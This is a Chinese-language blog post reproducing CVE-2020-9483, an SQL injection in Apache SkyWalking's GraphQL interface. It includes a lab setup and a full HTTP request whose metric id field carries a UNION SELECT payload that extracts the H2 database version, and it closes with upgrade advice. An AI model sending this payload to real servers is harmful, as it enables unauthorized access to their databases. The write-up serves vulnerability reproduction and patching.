Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现

admin 2021年4月24日03:12:36评论156 views字数 862阅读2分52秒阅读模式

简介

 

Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。

影响版本

 

Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0

环境搭建

 

这里下载6.5.0进行搭建

下载地址

https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz


进入bin目录并启动

cd apache-skywalking-apm-bin/bin/./startup.sh


 

Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现


访问http://your-ip:8080即可查看Skywalking的页面。

 

Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现

 

漏洞复现

 

构建数据包并发送

POST /graphql HTTP/1.1Host: ip:8080Content-Type: application/json;charset=utf-8Content-Length: 313Connection: close {"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: "all_p99", id: "') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}


Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现


成功获取H2的版本信息

修复建议

 

升级到安全版本

下载地址

https://github.com/apache/skywalking/releases


本文始发于微信公众号(锋刃科技):Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月24日03:12:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现https://cn-sec.com/archives/290275.html

发表评论

匿名网友 填写信息